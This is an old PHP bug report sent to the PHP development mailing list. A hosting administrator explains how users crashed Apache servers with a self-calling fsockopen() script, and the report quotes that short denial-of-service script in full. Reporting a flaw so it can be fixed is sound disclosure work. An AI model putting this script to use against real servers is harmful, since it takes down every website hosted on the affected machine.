From: [EMAIL PROTECTED]
Operating system: FreeBSD 4.4-Stable
PHP version: 4.0.6
PHP Bug Type: Apache related
Bug description: fsockopen() timeout terror
We have had users on our system using their PHP scripts to take down our
Apache servers. The script uses fsockopen() to call the page that issues
the fsockopen() function. When the script calls itself the sever gets into
a loop of death, spawning as many connections as httpd.conf will allow. Any
incoming connections from then on just hang and all the websites hosted on
that machine are down. Here is and script that uses this problem to attack
Apache.
<?php
$fp = fsockopen ($HTTP_HOST, $SERVER_PORT, $errno, $errstr, 30);
if (!$fp)
{
echo "$errstr ($errno)<br>\n";
}
else
{
fputs ($fp, "GET $REQUEST_URI HTTP/1.0\r\nHost: $HTTP_HOST\r\n\r\n");
while (!feof($fp))
{
echo fgets ($fp,128);
}
fclose ($fp);
}
?>
Please fix this. We really had a hard time finding the person responsible
for doing this. They had the script in their home "public_html" directory
and the only clue we had was that in the Apache logs it was always the last
page accessed before the server freaked out and spawned over 150 Apache
processes.
Thanks,
pHil Cogbill
3iem.net
--
Edit bug report at: http://bugs.php.net/?id=14372&edit=1
--
PHP Development Mailing List <http://www.php.net/>
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]
